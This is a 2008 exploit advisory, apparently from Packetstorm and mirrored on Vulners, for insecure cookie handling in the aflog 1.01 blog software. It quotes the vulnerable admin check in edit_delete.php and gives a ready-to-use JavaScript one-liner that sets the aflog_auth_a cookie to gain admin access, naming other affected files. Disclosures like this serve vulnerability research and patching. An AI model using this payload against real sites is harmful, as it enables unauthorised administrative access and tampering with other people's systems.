Lucene search

K

aflog-insecure.txt

🗓️ 23 Oct 2008 00:00:00Reported by JosSType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilities in edit_delete.php fil

Show more
Code
`# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies  
# url: http://www.aflog.org/download.php  
#  
# Author: JosS  
# mail: sys-project[at]hotmail[dot]com  
# site: http://spanish-hackers.com  
# team: Spanish Hackers Team - [SHT]  
#  
# This was written for educational purpose. Use it at your own risk.  
# Author will be not responsible for any damage.  
  
vuln file: /edit_delete.php  
vuln code:  
15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){  
xx: .. ---> :P  
33: }  
34: } else {  
35: echo "<center><b><img src='img/x.png'>&nbsp;ERROR!</b><br>You do not have access to this page. You must be Signed In as  
36: an Admin.</center><br>";  
37: echo "<center><a href='index.php' class='c'>Home</a> | <a href='login.php?do=form' class='c'>Sign In</a></center>":  
38: }  
  
exploit: javascript:document.cookie = "aflog_auth_a=0; path=/"; document.cookie = "aflog_auth_a=A; path=/";  
---  
vuln files:  
edit_cat.php  
edit_lock.php  
edit_form.php  
  
...more?  
  
Hack0wn :D  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
17
.json
Report